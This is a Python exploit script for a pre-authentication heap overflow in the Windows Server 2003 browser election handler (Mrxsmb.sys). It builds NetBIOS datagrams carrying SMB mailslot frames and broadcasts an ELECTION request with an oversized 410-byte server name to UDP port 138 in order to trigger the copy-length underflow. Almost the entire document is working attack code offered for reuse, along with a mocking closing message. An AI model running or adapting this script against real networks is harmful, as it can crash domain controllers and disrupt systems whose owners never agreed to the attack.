
# Title : MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
# Published : 2011-02-14
# Author : Cupidon-3005


####################################################################################
#MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
#Release date: 2011-02-14
#Author: Cupidon-3005
#Greet: Winny Thomas, Laurent Gaffie, h07
#Bug: Heap Overflow
#Remote Exploitability: Unlikely
#Local Exploitability: Likely
#Context: Broadcast, Pre-Auth
#####################################################################################
#Mrxsmb.sys crashes around BowserWriteErrorLog+0x175 while trying to copy ~1 GB from ESI to EDI ...
#Code will look something like this:
#if (((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len = TotalBufferSize / sizeof(WCHAR) - 1; }
#When TotalBufferSize / sizeof(WCHAR) evaluates to 0 (presumably an undersized buffer), the unsigned "- 1" wraps Len to 0xFFFFFFFF.
#Feel free to reuse this code without restrictions...

import socket,sys,struct
from socket import *

# Positional arguments: our own IP, the broadcast address, the NetBIOS name to
# claim as the sender, and the target AD/browser name. Four are required, so
# argv must hold at least five entries (argv[0] is the script itself).
if len(sys.argv) < 5:
    sys.exit("usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME \n example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah AD-NETBIOS-NAME")

ourip, host = sys.argv[1], sys.argv[2]
# NetBIOS names are upper-cased before encoding, as they appear on the wire.
srcname, dstname = sys.argv[3].upper(), sys.argv[4].upper()


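# NetBIOS name suffixes, already in first-level ("half-ASCII") encoding and
# NUL-terminated, as encodename() expects for its *service* argument: each
# nibble of the raw suffix byte becomes 'A' + nibble, so "BO" is suffix 0x1E
# and "AA" is suffix 0x00.
# NOTE: the published listing had lost its backslash escapes ("x42x4fx00");
# they are restored here so the suffixes are 3 bytes, not 9 characters.
ELEC            = b"\x42\x4f\x00"   # suffix 0x1E: used as the election destination
WREDIR          = b"\x41\x41\x00"   # suffix 0x00: used as the sending workstation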

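def encodename(nbt, service):
    """Return *nbt* as a NetBIOS first-level encoded name followed by *service*.

    Layout: a 0x20 length byte, then every byte of the name split into two
    nibbles with each nibble mapped to 'A' + nibble ("AB" -> "EBEC"), then
    space padding (0x20 -> "CA") out to 15 name bytes, then *service*, which
    callers pass already encoded: two letters for the 16th byte (the NetBIOS
    suffix) plus the NUL that terminates the name.

    *nbt* and *service* may be str (latin-1) or bytes; the result is bytes,
    so the function works on Python 2 and 3 alike.

    Names longer than 15 bytes are NOT truncated (the padding term just goes
    to zero), so the caller must keep the name within the NetBIOS limit or
    the encoded name will be longer than the 34 bytes a receiver expects.

    NOTE: the published listing had lost its backslash escapes ('x20',
    'x43x41'); they are restored here.
    """
    raw = bytearray(nbt if isinstance(nbt, bytes) else nbt.encode("latin-1"))
    suffix = service if isinstance(service, bytes) else service.encode("latin-1")
    encoded = bytearray(b"\x20")
    for byte in raw:
        encoded.append((byte >> 4) + 0x41)      # high nibble -> 'A'..'P'
        encoded.append((byte & 0x0F) + 0x41)    # low nibble  -> 'A'..'P'
    encoded += b"\x43\x41" * (15 - len(raw))    # pad with encoded spaces
    return bytes(encoded) + suffix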

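def lengthlittle(packet, addnum):
    """Return ``len(packet) + addnum`` as a 16-bit little-endian field (bytes).

    Used for the SMB / transaction counts and offsets, which are little-endian
    on the wire. *addnum* lets callers account for bytes that are not yet
    appended when the field is computed. Only the low 16 bits are kept, which
    matches what the original 32-bit pack-and-slice produced (including for
    negative totals); values that no longer fit are wrapped rather than
    raising.
    """
    return struct.pack("<H", (len(packet) + addnum) & 0xFFFF)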

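def lengthbig(packet, addnum):
    """Return ``len(packet) + addnum`` as a 16-bit big-endian field (bytes).

    Used for the NetBIOS datagram length, which is big-endian on the wire
    (unlike the SMB fields produced by lengthlittle()). Only the low 16 bits
    are kept, matching the original 32-bit pack-and-slice; oversized totals
    wrap rather than raising.
    """
    return struct.pack(">H", (len(packet) + addnum) & 0xFFFF)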

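def election(srcname):
    """Build a browser ELECTION request body that names *srcname* as the sender.

    The fixed prefix is the original author's "be the boss" values: the
    election opcode (0x08), a version byte, four criteria bytes, an up-time
    and a reserved dword (field names per the MS-BRWS layout; the comments in
    the original only said "Be the boss or die"). The only variable part is
    the trailing NUL-terminated server name, which is the field this PoC
    oversizes to trigger the copy-length underflow described in the header.

    *srcname* may be str (latin-1) or bytes; the result is bytes.

    NOTE: the published listing had lost its backslash escapes ("x08", ...);
    they are restored here.
    """
    name = srcname if isinstance(srcname, bytes) else srcname.encode("latin-1")
    return b"".join([
        b"\x08",              # opcode: election request
        b"\x09",              # version  ("Be the boss or die")
        b"\xa8\x0f\x01\x20",  # criteria ("Be the boss or die")
        b"\x1b\xe9\xa5\x00",  # up time
        b"\x00\x00\x00\x00",  # reserved ("Null, like SDLC")
        name,
        b"\x00",              # name terminator
    ])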

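def smbheaderudp(op=b"\x25"):
    """Return a zeroed 32-byte SMB header whose command byte is *op*.

    Everything except the protocol id and the command is zero: status,
    flags, flags2, PID high, the 8-byte signature, reserved, TID, PID, UID
    and MID (field names per the SMB v1 header layout, which this matches
    byte for byte). The default command 0x25 is the one the mailslot
    transaction in trans2mailslot() is sent with.

    *op* may be a 1-byte str or bytes; the result is bytes.

    NOTE: the published listing had lost its backslash escapes ("xffx53x4dx42");
    they are restored here so the header really starts with "\\xffSMB".
    """
    command = op if isinstance(op, bytes) else op.encode("latin-1")
    return b"".join([
        b"\xff\x53\x4d\x42",  # protocol id: "\xffSMB"
        command,              # command
        b"\x00\x00\x00\x00",  # status
        b"\x00",              # flags
        b"\x00\x00",          # flags2
        b"\x00\x00",          # PID high
        b"\x00" * 8,          # security signature
        b"\x00\x00",          # reserved
        b"\x00\x00",          # TID
        b"\x00\x00",          # PID
        b"\x00\x00",          # UID
        b"\x00\x00",          # MID
    ])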


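def trans2mailslot(tid=b"\x80\x0b", ip=None, sname="LOVE-SDL", dname="SRD-LOVE",
                   namepipe="\\MAILSLOT\\BROWSE", srcservice=b"\x41\x41\x00",
                   dstservice=b"\x41\x41\x00", pbrowser=b""):
    """Wrap *pbrowser* in an SMB transaction mailslot write inside a NetBIOS datagram.

    The result is the complete UDP/138 payload, in this order: a 14-byte
    NetBIOS datagram header, the encoded source and destination names, a
    32-byte SMB header, the transaction parameter words, the mailslot setup
    words, byte count and name, and finally the browser payload.

    Args:
        tid: 2-byte datagram id.
        ip: dotted-quad source address; ``None`` means the module-level
            ``ourip`` (resolved at call time, so importing this module no
            longer requires ``ourip`` to exist).
        sname, dname: raw (unencoded) source and destination NetBIOS names.
        namepipe: mailslot name without its NUL (one is appended here).
        srcservice, dstservice: encoded 16th-byte suffix plus NUL for each
            name, see encodename().
        pbrowser: browser-protocol payload, e.g. election().

    Returns:
        bytes ready for sendto(). str arguments are taken as latin-1.

    NOTE: the published listing had lost its backslash escapes ("x80x0b",
    "MAILSLOTBROWSE"); they are restored here. The unused ``andoffset``
    local of the original has been dropped.
    """
    def _b(value):
        # Accept str on Python 3 (and unicode on Python 2) as well as bytes.
        return value if isinstance(value, bytes) else value.encode("latin-1")

    tid, namepipe, payload = _b(tid), _b(namepipe), _b(pbrowser)
    if ip is None:
        ip = ourip

    # Mailslot setup words, ByteCount and the NUL-terminated mailslot name.
    # NOTE(review): ByteCount is len(payload) + len(name) + 4 as published,
    # but only name + NUL + payload actually follow it, so the value is 3
    # bytes more than what is emitted; kept unchanged, confirm on a capture.
    mailslot = b"".join([
        b"\x01\x00",                          # setup[0]: mailslot opcode (write)
        b"\x00\x00",                          # setup[1]: priority
        b"\x02\x00",                          # setup[2]: class
        lengthlittle(payload + namepipe, 4),  # ByteCount
        namepipe, b"\x00",
    ])

    smbheader = smbheaderudp(b"\x25")

    # Transaction parameter words. WordCount 0x11 (17) includes the three
    # setup words that live in `mailslot` above.
    trans_head = b"".join([
        b"\x11",                    # WordCount
        b"\x00\x00",                # TotalParameterCount
        lengthlittle(payload, 0),   # TotalDataCount
        b"\x00\x00",                # MaxParameterCount
        b"\x00\x00",                # MaxDataCount
        b"\x00",                    # MaxSetupCount
        b"\x00",                    # Reserved
        b"\x00\x00",                # Flags
        b"\xe8\x03\x00\x00",        # Timeout (1000, little-endian)
        b"\x00\x00",                # Reserved2
        b"\x00\x00",                # ParameterCount
        b"\x00\x00",                # ParameterOffset
        lengthlittle(payload, 0),   # DataCount
    ])
    # DataOffset is measured from the start of the SMB header to the payload:
    # everything built so far plus the 4 bytes still to come (DataOffset
    # itself, SetupCount and the reserved byte).
    data_offset = lengthlittle(smbheader + trans_head + mailslot, 4)
    trans = trans_head + data_offset + b"\x03" + b"\x00"   # SetupCount=3, Reserved

    # NetBIOS datagram: the header's length field covers everything that
    # follows the 14-byte header (names through payload).
    body = (encodename(sname, srcservice) + encodename(dname, dstservice)
            + smbheader + trans + mailslot + payload)
    header = b"".join([
        b"\x11",              # message type: direct group datagram
        b"\x02",              # flags
        tid,                  # datagram id
        inet_aton(ip),        # source IP
        b"\x00\x8a",          # source port 138
        lengthbig(body, 0),   # datagram length (big-endian)
        b"\x00\x00",          # packet offset
    ])
    return header + body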

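def sockbroad(host, sourceservice, destservice, packet):
    """Broadcast one mailslot-carrying NetBIOS datagram to *host* port 138.

    The datagram is built by trans2mailslot(); note that the sender address
    and both NetBIOS names come from the module-level ``ourip``, ``srcname``
    and ``dstname`` parsed from argv, not from the arguments. *packet* is the
    browser payload (e.g. election()); *sourceservice*/*destservice* are the
    encoded name suffixes. Sending from local UDP port 138 requires binding a
    privileged port, so this normally has to run as root/Administrator.

    Any failure is reported on stdout (as the original did) and re-raised;
    the socket is closed on every path.

    NOTE: the published listing had lost its backslash escapes; they are
    restored here. The mailslot name at this call site, "\\MAILSLOT\\BROWSER",
    differs from the "\\MAILSLOT\\BROWSE" default in trans2mailslot() and was
    kept as published -- confirm which one the target actually processes.
    """
    sock = socket(AF_INET, SOCK_DGRAM)
    try:
        sock.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
        sock.bind(("0.0.0.0", 138))
        datagram = trans2mailslot(tid=b"\x80\x22", ip=ourip, sname=srcname, dname=dstname,
                                  namepipe="\\MAILSLOT\\BROWSER", srcservice=sourceservice,
                                  dstservice=destservice, pbrowser=packet)
        sock.sendto(datagram, (host, 138))
    except Exception:
        print("expected SDL error: %s" % (sys.exc_info()[0],))
        raise
    finally:
        sock.close()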
 
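# Fire the election request with an oversized server name; the original
# author reports the crash for names of roughly 60 to 410 bytes ("Zing it!").
sockbroad(host, WREDIR, ELEC, election("A" * 410))
# NOTE: the published listing had lost the "\n" escape in this message.
print("Happy St-Valentine Bitches\nMSFT found that one loooooooong time ago....")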